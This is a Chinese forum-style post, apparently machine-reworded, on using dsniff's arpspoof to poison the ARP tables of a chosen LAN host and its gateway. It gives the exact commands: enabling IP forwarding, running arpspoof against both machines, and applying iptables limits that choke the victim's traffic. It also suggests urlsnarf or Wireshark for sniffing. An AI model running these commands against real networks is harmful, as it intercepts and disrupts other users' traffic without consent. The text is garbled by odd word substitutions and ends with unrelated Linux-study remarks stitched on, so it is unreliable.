Linux设计linux上限制局域网外部利用p2p软件的主机仓酷云
经常看到有人问用什么版本的linux好,其实只要你认真学习无论什么版本都挺好的。windows下有p2p闭幕者,linux下咱有dsniff,先容:here,其的用处之一就是做arp棍骗,详细命令是arpspoof.
感化:
arpspoof将局域网内的方针主机大概是一切主机的发送数据包经由过程ARP棍骗来重指向。在利用互换机的局域网情况下是一个十分无效的办法来嗅探数据:)注重:kernel的ip转发必需要提早翻开
利用:
arpspoof[-iinterface][-ttarget]host-i用来唆使要利用的网卡接口,通常为eth0,-t用来唆使要棍骗的方针主机,假如不标明则默许为局域网外部的一切主机host你要截取数据包的主机,一般是网关详细利用:
情况archlinux,要限定的ip为192.168.0.29,本机ip为192.168.0.24,实行室网管为192.168.0.1
1安装
sudopacman-Sdsniff2开启内核转发和棍骗
#echo1>/proc/sys/net/ipv4/ip_forward#棍骗192.168.0.29,告知这台呆板网关192.168.0.1的MAC地点是本人(192.168.0.24)。
$sudoarpspoof-ieth0-t192.168.0.29192.168.0.1#棍骗192.168.0.1,告知网关192.168.0.29的MAC地点是本人(192.168.0.24)
$sudoarpspoof-ieth0-t192.168.0.1192.168.0.29192.168.0.29觉得192.168.0.24就是192.168.0.1,192.168.0.1觉得192.168.0.24就是192.168.0.29
3使用iptables入手下手限速
#192.168.0.29被限定每秒只能传输3个数据包了
$sudoiptables-AFORWARD-s192.168.0.29-mlimit--limit3/s-jACCEPT$sudoiptables-AFORWARD-d192.168.0.29-mlimit--limit3/s-jACCEPT$sudoiptables-AFORWARD-s192.168.0.29-jDROP$sudoiptables-AFORWARD-d192.168.0.29-jDROP4固然,假如你想干好事的话能够用urlsnarf大概wireshark之类的。。。。恩
参考材料:
http://microcai.gsalex.net/archives/2010/11/p2p-killer-for-linux.html
http://www.yuanma.org/data/2006/0914/article_1536.htm
安装和登录命令:login、shutdown、halt、reboot、mount、umount、chsh 感谢老师和同学们在学习上对我的帮助。 用户下达的命令解释给系统去执行,并将系统传回的信息再次解释给用户,估shell也称为命令解释器,有关命令的学习可参考论坛相关文章,精通英文也是学习Linux的关键。 随着实验课程的结束,理论课也该结束了,说实话教OS的这两位老师是我们遇到过的不错的老师(这话放这可能不太恰当). 这种补充有助于他人在邮件列表/新闻组/论坛中搜索对你有过帮助的完整解决方案,这可能对他们也很有用。 和私有操作系统不同,各个Linux的发行版本的技术支持时间都较短,这对于Linux初学者是往往不够的。 了解Linux的网络安全,系统的安全,用户的安全等。安全对于每位用户,管理员来说是非常重要的。 Linux是参照Unix思想设计的,理解掌握Linux必须按照Unix思维来进行。思想性的转变比暂时性的技术提高更有用,因为他能帮助你加快学习速度。 熟读Linux系统有关知识,如系统目录树,有关内容可购书阅读或搜索论坛。 直到学习Linux这门课以后,我才知道,原来我错了。? 任何一个叫做操作系统的东西都是这样子构成的:内核+用户界面+一般应用程序。 安装一个新的软件时先看README,再看INSTALL然后看FAQ,最后才动手安装,这样遇到问题就知道为什么。如果Linux说明文档不看,结果出了问题再去论坛来找答案反而浪费时间。
页:
[1]